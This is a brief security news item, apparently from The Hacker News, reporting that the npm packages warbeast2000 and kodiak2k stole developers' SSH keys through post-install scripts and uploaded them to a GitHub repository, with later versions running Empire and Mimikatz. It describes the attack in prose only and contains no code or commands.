Malicious NPM Packages Exfiltrate Hundreds of Developer SSH Keys via GitHub>
The Hacker News –
Two malicious npm packages, warbeast2000 and kodiak2k, were found to exploit GitHub to store stolen SSH keys obtained from developers’ systems.
These packages garnered 412 and 1,281 downloads before being removed by npm maintainers, with the most recent downloads occurring on January 21, 2024\) ReversingLabs, a software supply chain security firm, discovered multiple versions of warbeast2000 and kodiak2k, with warbeast2000 having eight versions and kodiak2k having over 30\)
Both packages are designed to execute a post-install script after installation, which fetches and runs two separate JavaScript files.
Warbeast2000 targets private SSH keys, while kodiak2k looks for a key named “meow,” potentially indicating a placeholder name during early development.
These packages upload the Base64-encoded keys to an attacker-controlled GitHub repository, compromising the security of affected systems.
Additionally, subsequent versions of kodiak2k were found to launch the Empire post-exploitation framework from an archived GitHub project and execute the Mimikatz hacking tool to extract credentials from process memory.
ReversingLabs highlighted this as the latest example of cybercriminals using open source package managers and related infrastructure in malicious software supply chain campaigns targeting development and end-user organizations.
Link: https://thehackernews.com/2024/01/malicious-npm-packages-exfiltrate-1600.html